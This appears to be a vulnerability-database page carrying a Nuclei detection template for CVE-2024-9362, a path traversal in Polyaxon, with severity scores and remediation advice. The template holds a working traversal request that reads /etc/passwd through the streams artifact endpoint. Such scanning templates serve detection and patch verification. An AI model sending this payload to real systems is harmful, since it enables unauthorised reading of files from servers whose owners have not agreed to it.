Polyaxon - Unauthenticated Directory Traversal
CVE-2024-9362
Verified
Description
Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.
Severity
High
CVSS Score
7.5
Exploit Probability
4%
Published Date
May 23, 2026
Template Author
yunseo
CVE-2024-9362.yaml
id: CVE-2024-9362
info:
name: Polyaxon - Unauthenticated Directory Traversal
author: yunseo
severity: high
description: |
Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.
impact: |
Attackers can access sensitive system directories and files, leading to information disclosure and potential further exploitation.
remediation: |
Update to the latest version with patched validation mechanisms.
reference:
- https://github.com/polyaxon/polyaxon
- https://huntr.com/bounties/d8dcb40f-ce76-4524-8d06-e0f12a07809d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-9362
epss-score: 0.04274
epss-percentile: 0.90387
cwe-id: CWE-22
metadata:
max-request: 1
verified: true
fofa-query: title=="Polyaxon"
tags: cve,cve2024,polyaxon,lfi,traversal,unauth
http:
- method: GET
path:
- "{{BaseURL}}/streams/v1/polyaxon/default/s/runs/%2e%2e/artifact?stream=true&path=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100c4f3e9025c9f89dfbdd0e01ebcc39f8874be02a6a7618219d2a4b6ad9722c7aa02210080be492d020169f05c768273e1cd28be0cfb645f42512811c2afa5bb2a05a5b2:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-9362
CWE ID:
cwe-22
Remediation Steps
Update to the latest version with patched validation mechanisms.